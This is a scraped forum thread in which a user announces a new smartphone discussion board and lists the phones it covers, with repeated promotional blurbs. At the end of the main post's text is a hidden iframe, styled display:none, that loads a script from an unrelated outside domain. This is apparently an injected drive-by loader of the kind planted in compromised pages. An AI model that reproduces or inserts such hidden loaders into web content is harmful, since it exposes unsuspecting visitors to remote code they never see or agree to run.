+ Reply to Thread
    smartphonecentral.com

Announcement: Smartphonecentral.com

I've taken the plunge and started a smartphone discussion board. I've set up areas for different kinds of phones, as well as a general discussion area at:

Smartphonecentral.com

I know a lot of people are starting to look past the I300 to their next smartphone. Personally, I'm hoping the Sony/Ericsson P800 is as good as it looks.

If you're interested in discussing the next generation of smartphones, then check out smartphonecentral.com.

Thanks to Brooks for letting me post this announcement, and for all his work with sphi300.com!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    New smartphone discussion board! :cool:
    :: Visit smartphonecentral.com today and start talking! ::

Don't Forget About...

SmartPhoneSource

Smart Phone Source is the leading board for discussions about the Kyo-6035 and up and coming 7135.

smartphonecentral.com
    We now have boards at smartphonecentral.com for the Samsung I300/I330/I500 and Samsung I600/I700, plus other upcoming smartphones from Kyocera, Sony/Ericsson and others.

Although we're just getting started, we hope you can join us as the site grows into a resource for smartphone users everywhere.
    New smartphone discussion board! :cool:
    :: Visit smartphonecentral.com today and start talking! ::